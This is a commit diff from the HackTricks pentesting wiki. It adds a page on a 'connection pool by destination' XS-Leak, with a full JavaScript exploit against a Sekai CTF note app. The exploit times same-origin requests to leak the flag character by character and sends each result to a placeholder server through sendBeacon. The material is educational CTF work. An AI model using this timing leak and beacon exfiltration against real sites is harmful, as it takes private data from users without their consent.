GitBook: [#3601] No subject

2024-11-21 20:23:18 +00:00 · 2022-10-12 22:10:40 +00:00 · 2022-10-12 22:10:40 +00:00 · 2c66dfdf73
commit 2c66dfdf73
parent 29ae0b070c
4 changed files with 145 additions and 0 deletions
--- a/SUMMARY.md
+++ b/SUMMARY.md
@ -562,6 +562,7 @@
 * [XSSI (Cross-Site Script Inclusion)](pentesting-web/xssi-cross-site-script-inclusion.md)
 * [XS-Search/XS-Leaks](pentesting-web/xs-search.md)
  * [Connection Pool Example](pentesting-web/xs-search/connection-pool-example.md)
+  * [Connection Pool by Destination Example](pentesting-web/xs-search/connection-pool-by-destination-example.md)
  * [Event Loop Blocking + Lazy images](pentesting-web/xs-search/event-loop-blocking-+-lazy-images.md)
  * [CSS Injection](pentesting-web/xs-search/css-injection/README.md)
    * [CSS Injection Code](pentesting-web/xs-search/css-injection/css-injection-code.md)
--- a/generic-methodologies-and-resources/exfiltration.md
+++ b/generic-methodologies-and-resources/exfiltration.md
@ -67,6 +67,8 @@ Start-BitsTransfer -Source $url -Destination $output -Asynchronous

 [**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)

+[**SimpleHttpServer printing GET and POSTs (also headers)**](https://gist.github.com/carlospolop/209ad4ed0e06dd3ad099e2fd0ed73149)****
+
 #### **HTTPS Server**

 ```python
--- a/pentesting-web/xs-search.md
+++ b/pentesting-web/xs-search.md
@ -275,6 +275,13 @@ Browsers use sockets to communicate with servers. As the operating system and th

 For more info: [https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/](https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/)

+### Connection Pool by Destination
+
+* **Inclusion Methods**: JavaScript Requests
+* **Detectable Difference**: Timing (generally due to Page Content, Status Code)
+* **More info**:&#x20;
+* **Summary:** It's like the previous technique but instead of using all the sockets, Google **Chrome** puts a limit of **6 concurrent request to the same origin**. If we **block 5** and then **launch a 6th** request we can **time** it and if we managed to make the **victim page send** more **requests** to the same endpoint to detect a **status** of the **page**, the **6th request** will take **longer** and we can detect it.
+
 ##

 ![](<../.gitbook/assets/image (9) (1) (2).png>)
--- a/pentesting-web/xs-search/connection-pool-by-destination-example.md
+++ b/pentesting-web/xs-search/connection-pool-by-destination-example.md
@ -0,0 +1,135 @@
+# Connection Pool by Destination Example
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>
+
+In [**this exploit**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html), [**@terjanq**](https://twitter.com/terjanq) proposes yet another solution for the challenged mentioned in the following page:
+
+{% content-ref url="connection-pool-by-destination-example.md" %}
+[connection-pool-by-destination-example.md](connection-pool-by-destination-example.md)
+{% endcontent-ref %}
+
+Let's see how this exploit work:
+
+* The attacker will inject a note with as many **`<img`** tags **loading** **`/js/purify.js`** as possible (more than 6 to block the origin).
+* Then, the attacker will **remove** the **note** with index 1.
+* Then, the attacker will \[make the **bot access the page** with the reminding note] and will send a **request** to **`victim.com/js/purify.js`** that he will **time**.&#x20;
+  * If the time is **bigger**, the **injection** was in the **note** left, if the time is **lower**, the **flag** was in there.
+
+{% hint style="info" %}
+Tbh, reading the script I missed some part where the **attacker makes the bot load the page to trigger the img tags**, I don't see anything like that in the code
+{% endhint %}
+
+```html
+<html>
+    <head>
+        <script>
+            const SITE_URL = 'https://safelist.ctf.sekai.team/';
+            const PING_URL = 'https://myserver';
+            function timeScript(){
+                return new Promise(resolve => {
+                    var x = document.createElement('script');
+                    x.src = 'https://safelist.ctf.sekai.team/js/purify.js?' + Math.random();
+                    var start = Date.now();
+                    x.onerror = () => {
+                        console.log(`Time: ${Date.now() - start}`); //Time request
+                        resolve(Date.now() - start);
+                        x.remove();
+                    }
+                    document.body.appendChild(x);
+                });
+            }
+
+            add_note = async (note) => {
+                let x = document.createElement('form')
+                x.action = SITE_URL + "create"
+                x.method = "POST"
+                x.target = "xxx"
+
+                let i = document.createElement("input");
+                i.type = "text"
+                i.name = "text"
+                i.value = note
+                x.appendChild(i)
+                document.body.appendChild(x)
+                x.submit()
+            }
+            
+            remove_note = async (note_id) => {
+                let x = document.createElement('form')
+                x.action = SITE_URL+"remove"
+                x.method = "POST"
+                x.target = "_blank"
+
+                let i = document.createElement("input");
+                i.type = "text"
+                i.name = "index"
+                i.value = note_id
+                x.appendChild(i)
+                document.body.appendChild(x)
+                x.submit()
+            }
+            
+            const sleep = ms => new Promise(resolve => setTimeout(resolve, ms));
+            // }zyxwvutsrqponmlkjihgfedcba_
+            const alphabet = 'zyxwvutsrqponmlkjihgfedcba_'
+            var prefix = 'SEKAI{xsleakyay';
+            const TIMEOUT = 500;
+            async function checkLetter(letter){
+                // Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js
+                // Depending whether we found flag's letter it will either load the images or not.
+                // With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.
+                const payload = `${prefix}${letter}` + Array.from(Array(78)).map((e,i)=>`<img/src=/js/purify.js?${i}>`).join('');
+                await add_note(payload);
+                await sleep(TIMEOUT);
+                await timeScript();
+                await remove_note(1); //Now, only the note with the flag or with the injection existsh
+                await sleep(TIMEOUT);
+                const time = await timeScript(); //Find out how much a request to the same origin takes
+                navigator.sendBeacon(PING_URL, [letter,time]);
+                if(time>100){
+                    return 1;
+                }
+                return 0;
+            }
+            window.onload = async () => {
+                navigator.sendBeacon(PING_URL, 'start');
+                // doesnt work because we are removing flag after success.
+                // while(1){
+                    for(const letter of alphabet){
+                        if(await checkLetter(letter)){
+                            prefix += letter;
+                            navigator.sendBeacon(PING_URL, prefix);
+                            break;
+                        }
+                    }
+                // }
+            };            
+            </script>            
+    </head>
+    <body>
+    </body>
+</html>
+
+```
+
+<details>
+
+<summary><strong>Support HackTricks and get benefits!</strong></summary>
+
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+</details>